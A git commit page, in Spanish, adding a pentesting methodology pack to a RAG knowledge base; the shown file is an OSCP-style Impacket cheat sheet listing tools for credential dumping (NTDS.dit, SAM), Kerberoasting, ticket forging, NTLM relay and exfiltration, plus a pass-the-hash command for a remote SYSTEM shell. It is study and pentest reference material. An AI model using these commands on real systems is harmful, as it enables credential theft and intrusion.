saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
This commit is contained in:
parent
12987539a4
commit
7e06ce46cf
76 changed files with 2682 additions and 8 deletions
26
nucleo/saber/conocimiento/05 - Active Directory/Impacket.md
Normal file
26
nucleo/saber/conocimiento/05 - Active Directory/Impacket.md
Normal file
|
|
@ -0,0 +1,26 @@
|
|||
# Impacket
|
||||
|
||||
> Suite **Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) sin ser Windows. Es como tener un "Windows hablante" en Kali.
|
||||
|
||||
## Los más útiles
|
||||
```
|
||||
impacket-psexec → shell en la víctima si tienes creds (estilo PsExec)
|
||||
impacket-wmiexec → ejecutar comandos sin tocar disco
|
||||
impacket-smbexec → otra ejecución remota
|
||||
impacket-secretsdump → vuelca NTDS.dit y SAM de un DC en remoto → secretsdump
|
||||
impacket-GetUserSPNs → Kerberoasting
|
||||
impacket-GetNPUsers → AS-REP Roasting
|
||||
impacket-getTGT → pide/forja un TGT con cred conocida
|
||||
impacket-getST → pide un service ticket
|
||||
impacket-smbserver → share SMB falso para exfiltrar a Kali (Transferencia de ficheros)
|
||||
impacket-ntlmrelayx → relay NTLM
|
||||
impacket-ticketer → forja tickets → Golden Ticket
|
||||
```
|
||||
|
||||
## Lateral con hash (sin reverse shell nueva)
|
||||
```bash
|
||||
impacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'
|
||||
```
|
||||
Shell SYSTEM en otra máquina, autenticado y limpio → Pass-the-Hash, Movimiento lateral.
|
||||
|
||||
Relacionado: Mimikatz · Active Directory · OSCP MOC
|
||||
Loading…
Add table
Add a link
Reference in a new issue